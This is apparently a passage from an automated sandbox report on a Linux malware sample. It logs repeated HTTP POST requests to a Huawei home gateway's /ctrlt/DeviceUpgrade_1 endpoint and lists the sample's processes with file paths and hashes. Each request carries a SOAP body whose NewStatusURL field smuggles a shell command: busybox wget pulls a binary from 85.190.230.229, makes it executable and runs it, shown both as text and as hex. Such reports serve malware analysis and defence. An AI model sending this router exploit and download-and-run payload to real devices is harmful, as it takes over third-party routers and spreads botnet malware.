                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:11.817858934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:13.225747108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:16.009618998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:21.641453028 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      149192.168.2.1444274102.153.79.2037215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:10.512465954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:11.082108974 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      System Behavior

                                                                      Start time (UTC):11:16:54
                                                                      Start date (UTC):02/08/2024
                                                                      Path:/tmp/0lMevtsZn2.elf
                                                                      Arguments:/tmp/0lMevtsZn2.elf
                                                                      File size:5777432 bytes
                                                                      MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                      Start time (UTC):11:16:54
                                                                      Start date (UTC):02/08/2024
                                                                      Path:/tmp/0lMevtsZn2.elf
                                                                      Arguments:-
                                                                      File size:5777432 bytes
                                                                      MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                      Start time (UTC):11:16:54
                                                                      Start date (UTC):02/08/2024
                                                                      Path:/tmp/0lMevtsZn2.elf
                                                                      Arguments:-
                                                                      File size:5777432 bytes
                                                                      MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                      Start time (UTC):11:16:54
                                                                      Start date (UTC):02/08/2024
                                                                      Path:/tmp/0lMevtsZn2.elf
                                                                      Arguments:-
                                                                      File size:5777432 bytes
                                                                      MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                      Start time (UTC):11:16:54
                                                                      Start date (UTC):02/08/2024
                                                                      Path:/tmp/0lMevtsZn2.elf
                                                                      Arguments:-
                                                                      File size:5777432 bytes
                                                                      MD5 hash:0083f1f0e77be34ad27f849842bbb00c